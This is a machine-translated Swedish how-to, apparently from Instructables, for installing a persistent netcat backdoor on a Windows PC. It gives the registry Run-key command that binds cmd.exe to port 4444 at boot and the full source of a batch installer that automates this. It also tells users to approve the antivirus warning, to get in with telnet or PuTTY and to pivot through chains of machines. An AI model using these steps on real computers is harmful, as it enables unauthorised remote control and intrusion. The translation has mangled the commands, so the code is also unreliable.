Netcat Fun !: 5 steg

2024 Författare: John Day | [email protected]. Senast ändrad: 2024-01-30 12:46

Denna instruerbara visar dig hur du skapar en bakdörr på en dator med netcat! Jag kommer att visa dig två sätt att göra detta, med och utan min batchfil som automatiserar den åt dig. Detta instruerbara antar redan att du redan har root -behörigheter på datorn, förmodligen med en 0phcrack LiveCD här. Nu, till det instruerbara.

Steg 1: Ladda ner Netcat

Jag har sparat dig besväret med tre minuters sökning på Google och har lagt upp nc.exe på instruktioner som du kan ladda ner. Alternativt kan du också ladda ner nc.bat som är en batchfil som jag har skapat för att automatisera processen åt dig. Se till att om du laddar ner nc.bat är det 464 byte, eftersom jag fortsatte att ladda upp versioner och upptäckte att något var fel med det. Om det inte är 464 byte kommer programmet inte att överensstämma med detta instruerbara.

Steg 2: Med Nc.bat

Först måste båda filerna finnas i samma katalog för att nc.bat ska fungera korrekt. Jag föreslår att du använder en flash-enhet eller CD-ROM för den här åtgärden. Jag använde en 512 mb geek squad flash -enhet för detta, men det är bara jag. Så kopiera filerna till din externa medieenhet och ta dem till datorn som du har root på. Kom på mediaenheten och dubbelklicka på nc.bat. Detta kommer att kopiera nc.exe -filen till system32 -mappen i systemroten (vanligtvis C: / Windows eller C: / WINNT) och göra nödvändiga ändringar i registret. Skriv sedan ner IP -adressen. Det kommer att vara ungefär "192.168.1.103", vilket är mitt. När detta är gjort startar du om maskinen och loggar in. Då kan antivirusprogrammet fråga dig om du vill tillåta/tillåta programmet. Klicka på "Tillåt" eller liknande. Tänk på att i denna instruerbara kan du bara telneta in från datorns lokala nätverk. Lämna sedan, eller logga ut, eller vad du än vill.

Steg 3: Utan Nc.bat

För att göra detta måste du ha nc.exe på en CD eller Flash -enhet. Gå till datorn, logga in och anslut flash -enheten eller sätt i din CD. Härifrån finns det två sätt: Finslipade grafiska användargränssnitt för fönster, eller det smutsiga, gammaldags sättet för kommandotolken. Det smutsiga, gammaldags kommandotolken: Dra upp kommandotolken genom att gå till StartRun och skriv in:

cmd.exeNavigera dig till blixten eller din CD -enhet. Om du inte vet vilken enhet som är vilken, högerklicka på startknappen och klicka på utforska. Klicka på alla icke-lokala enheter i Den här datorn tills du kommer till din flash-/CD-enhet. Kom ihåg enhetens bokstav och gå tillbaka till kommandotolken. Skriv in enhetens bokstav följt av ett kolon, så här: K: Skriv sedan in en rad i taget, följt av att trycka på returtangenten

kopiera nc.exe%systemroot%\ system32 / nc.exereg lägg till HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "Det var ungefär installationen. Allt du behöver veta nu är den lokala IP -adressen, som enkelt kan hittas genom att skriva in 'ipconfig' -kommandot och leta efter något i tabellen som "192.168.1.103". Starta sedan om maskinen och logga in igen. Antivirusprogrammet kan fråga dig om du vill tillåta/tillåta. Klicka på Tillåt. Då är du fri att göra vad du vill med datorn. De polerade grafiska gränssnitten i Windows Högerklicka på startknappen och klicka på utforska. Klicka på alla icke-lokala enheter i Den här datorn tills du kommer till din flash-/CD-enhet. Högerklicka sedan på nc.exe och kopiera. Gå sedan till C -enheten och klicka på mappen Windows eller WINNT. Gå sedan till system32 -mappen och klistra in nc.exe. Stäng det och gå till StartRun. Skriv in regedit. Navigera genom mapparna till: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Högerklicka på ett tomt utrymme och gå till NewString Value. Skriv vad du vill för namnet, men för värdet, skriv in

%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exeDet var ungefär installationen. Allt du behöver veta nu är den lokala IP -adressen, som enkelt kan hittas genom att skriva kommandot 'ipconfig' i kommandotolken (StartRun: cmd.exe) och leta efter något i tabellen som "192.168.1.103". Starta sedan om maskinen och logga in igen. Antivirusprogrammet kan fråga dig om du vill tillåta/tillåta. Klicka på Tillåt. Då är du fri att göra vad du vill med datorn.

Steg 4: Gå tillbaka

När du har installerat det och du vill ta kontroll över värden öppnar du kommandotolken eller PuTTY. Jag tycker att PuTTY är fantastiskt, så jag låter dig ladda ner det här. Använd PuTTY Ladda ner och öppna PuTTY.exe. Klicka på det "råa" protokollet. Skriv 4444 i textrutan port #. I rutan "värdadress" skriver du in den IP -adress du skrev ner under installationen. Tryck sedan på enter. PuTTY bör ansluta till rutan och du får en kommandotolk. Använda kommandotolken Öppna kommandotolken och skriv in 'telnet 4444'. Tryck sedan på enter och du bör få en kommandotolk. Detta låter dig göra nästan vad du vill med datorn på distans som du kan göra med ett lokalt konto. Det börjar verkligen bli intressant när du går in på en dator och sedan går in i en annan dator från den datorn för att få en hel kedja av datorer anslutna. Ha (lagligt) kul!

Steg 5: Källkod

Eftersom jag har blivit tillfrågad lägger jag upp källkoden (för batchfilen) och förklarar varje kommando och vad det gör. Var medveten! Detta är den aktuella versionen av batchinstallationsprogrammet. Om din är annorlunda kommer koden att skilja sig åt.

@echo offcopy nc.exe%systemroot%\ system32 / nc.exeif errorlevel 0 gå till regeditgoto fel: regeditreg lägg till HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc. exe -L -d -p 4444 -t -e cmd.exe "om errorlevel 0 gå till ip: errorecho något oväntat har inträffat och programmet måste avsluta. gå slut: ipecho skriv ner IP -adressen från tableipconfig: endecho end.echo duct tape out.pause@echo off-Berättar att det inte ska visas kommandon när man kör.copy nc.exe %systemroot %\ system32 / nc.exe-kopierar vanligtvis netcat till C: / WINDOWS / system32. Detta gör det så att när du går in igen, istället för att ändra kataloger hela tiden, kan du bara skriva "nc" för att öppna en annan port.if errorlevel 0 gå till regedit-felkontroll. Om kopian lyckades fortsätter den med att redigera registret. Gå till fel-Om ett fel uppstod, gå till: feletikett.: Regedit- En etikett, ange att när programmet säger "gå till regedit", gå hit.reg lägg till HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" -(ska vara en rad) som lägger till registernyckeln för att starta om programmet när det startas om. /f betyder att skriva över befintlig nyckel, /v för nyckelnamn, /d för data. Resten av taggarna matas in för netcat. -L säger att starta om det vid utgång, så du behöver inte vänta på att datorn startar om. -d glömde jag. -p 4444 anger port #. -det glömde jag. -e cmd.exe gör att kommandotolken startar på fjärranslutning. om felnivå 0 går till ip-felkontroll. Om körningen gick fel skulle den hoppa över den här raden och gå ner till: error label.echo något oväntat har inträffat och programmet måste avsluta.-Säger till programmet att skriva ut "något oväntat har inträffat och programmet måste avsluta "på skärmen. gå till slutet-om det gick till felmeddelandet gick något fel och programmet måste stängas ändå.: ip- Återigen, label.echo skriva ner IP-adressen från tabellen-skriver" skriv ner IP: n adress från tabellen "till screen.ipconfig-Detta är ett kommando som skriver ut information om ditt lokala nätverk (LAN) -inställningar.:end-Label.echo end.-skriver" end "till screen.echo-bandet. -skriver "duct tape out" till skärmen. paus-det här kommandot pausar programmet och väntar på att användaren trycker på en knapp. I det här programmet väntar det på inmatning och avslutar sedan programmet.